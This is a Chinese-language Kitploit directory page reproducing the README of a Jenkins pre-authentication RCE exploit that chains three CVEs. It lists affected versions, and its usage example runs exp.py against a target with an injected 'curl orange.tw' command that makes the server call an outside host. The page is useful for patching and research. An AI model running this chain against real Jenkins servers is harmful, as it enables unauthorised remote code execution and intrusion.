Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
awesome-jenkins-rce-2019 — 自 2017 年 5 月起,Jenkins 中就不存在预认证 RCE 了,但这个就是! | Kitploit
工具/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

自 2017 年 5 月起,Jenkins 中就不存在预认证 RCE 了,但这个就是!

查看仓库
61012727年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

awesome-jenkins-rce-2019

自 2017 年 5 月以来,Jenkins 一直没有未认证 RCE,但这就是那个例外!

它将 CVE-2018-1000861、CVE-2019-1003005 和 CVE-2019-1003029 串联起来,实现了一种更可靠、更优雅的未认证远程代码执行!

受影响列表

  • ANONYMOUS_READ 禁用

    • Jenkins 版本 < 2.138
  • ANONYMOUS_READ 启用(或使用普通用户账户)

    • Jenkins 构建时间 < 2019-01-28

用法

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

测试环境

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138(ANONYMOUS_READ 已启用)
  • Jenkins 2.152(ANONYMOUS_READ 已启用)
  • Jenkins 2.153(ANONYMOUS_READ 已启用)
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

致谢

  • 感谢 @orange_8361 发现 CVE-2018-1000861
  • 感谢 @0ang3el 发现 CVE-2019-1003005
  • 感谢 @webpentest 发现 CVE-2019-1003029

以下是我 HITB AMS 2019 演讲的部分幻灯片:

1.png 2.png 3.png

参考资料

  • 攻击 Jenkins(第 1 部分):玩转动态路由
  • 攻击 Jenkins(第 2 部分):滥用元编程实现未认证 RCE!
  • Jenkins 安全公告 2018-12-05
  • Jenkins 安全公告 2019-01-28
  • Jenkins 安全公告 2019-03-06
下载工具